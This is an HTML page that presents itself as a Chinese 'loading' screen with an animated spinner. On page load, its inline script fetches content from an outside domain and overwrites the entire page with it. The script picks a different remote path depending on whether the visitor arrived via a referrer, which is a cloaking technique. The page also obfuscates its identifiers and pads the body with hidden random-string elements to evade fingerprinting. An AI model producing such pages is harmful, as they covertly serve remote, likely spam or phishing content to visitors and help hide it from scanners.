<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YJ7oCu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YJ7oCu .PihgCGQuJgF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YJ7oCu .content {
            line-height: 50px;
            text-align: center
        }

        .YJ7oCu .img {
            width: 100%
        }

        .YJ7oCu .ktpyBOKA {
            text-align: center
        }

        .YJ7oCu .ktpyBOKA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YJ7oCu .ktpyBOKA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YJ7oCu .ktpyBOKA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YJ7oCu .ktpyBOKA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YJ7oCu .ktpyBOKA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YJ7oCu .ktpyBOKA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YJ7oCu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lAJo3Fg22lVj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zwpQgIF = lAJo3Fg22lVj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zwpQgIF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zwpQgIF +".html?a=share";
		}
		
        Zg3yye=url+"#"+new Date().getTime();
        Zg3yye && function() {
            $.get(Zg3yye, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >l4OtlNcXqiy4jwq5ff3XtkNYtwjiMpg4oSjVS3u96OxRTL74SJtFl3ZpbGKSRETnGtQHuD0gBqtQl3tE2KHNpUKmAkS6hAck</b>
<b style='display:none' >l4OtlNcXqiy4jwq5ff3XtkNYtwjiMpg4oSjVS3u96OxRTL74SJtFl3ZpbGKSRETnGtQHuD0gBqtQl3tE2KHNpUKmAkS6hAck</b>
<b style='display:none' >l4OtlNcXqiy4jwq5ff3XtkNYtwjiMpg4oSjVS3u96OxRTL74SJtFl3ZpbGKSRETnGtQHuD0gBqtQl3tE2KHNpUKmAkS6hAck</b>
<img  src='' style='display:none'>
<p  style='display:none'>RoA4AQDNgecZTY1hhOIRjOByx7I3JdJHfraKzCQ1BfoGyiikAGAxyIBOIGhKaG7VcEciJxX6miVcMjRYhemgKU</p>
<ul style='display:none' >T23R39s8kfDcd57QPKd6br7C0lFkjPi7sCPOynXSX20fO4129ZJmEJOLDq60xbvaKzbvNvRpoeo7SFKyhi0h0</ul>
<span style='display:none'>ksm8BPTM0VCwFemPQVY3t9uG5CFCDETVM4GCmme9pYTcJkbNfAMD8A0YYPUVm2jbBzbJO5rXFLulnWpf</span><div class="YJ7oCu">
    <div class="PihgCGQuJgF">
        <div class="ktpyBOKA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >D3v5Fy1ks8Xa</ul>
<p  style='display:none'>BNCRuEmlo3V0KGtnuLJoJp4ZJfBHgW98uSjd5TLwFbqRxGmQxVV1pyo9qz2h587HIQSHNAFrYfd8PVi2yqX5S</p>
<li style='display:none' >SDlcIJGebEo5JOOx5ynY9Oy3ZED7eUTqSpbc36JEe3VWs3k4nG26aq3CD9Qmft1qi</li>
<span style='display:none'>D7DFqfCDiYJTDvPGpGEBT7yFTtTa876D</span>
<b style='display:none' >SQz980UXSZqm5nsvqyztTiiMS5r1wMG1GSfJ6bro02Gnfcn1sE</b>
<p  style='display:none'>BNCRuEmlo3V0KGtnuLJoJp4ZJfBHgW98uSjd5TLwFbqRxGmQxVV1pyo9qz2h587HIQSHNAFrYfd8PVi2yqX5S</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>yYeE2ECBCrGMoam8KwFR4ZJgIPjCbTEWaaDsGFBjrLOdWvdSWobrh</a>
<li style='display:none' >SDlcIJGebEo5JOOx5ynY9Oy3ZED7eUTqSpbc36JEe3VWs3k4nG26aq3CD9Qmft1qi</li></body>
</html>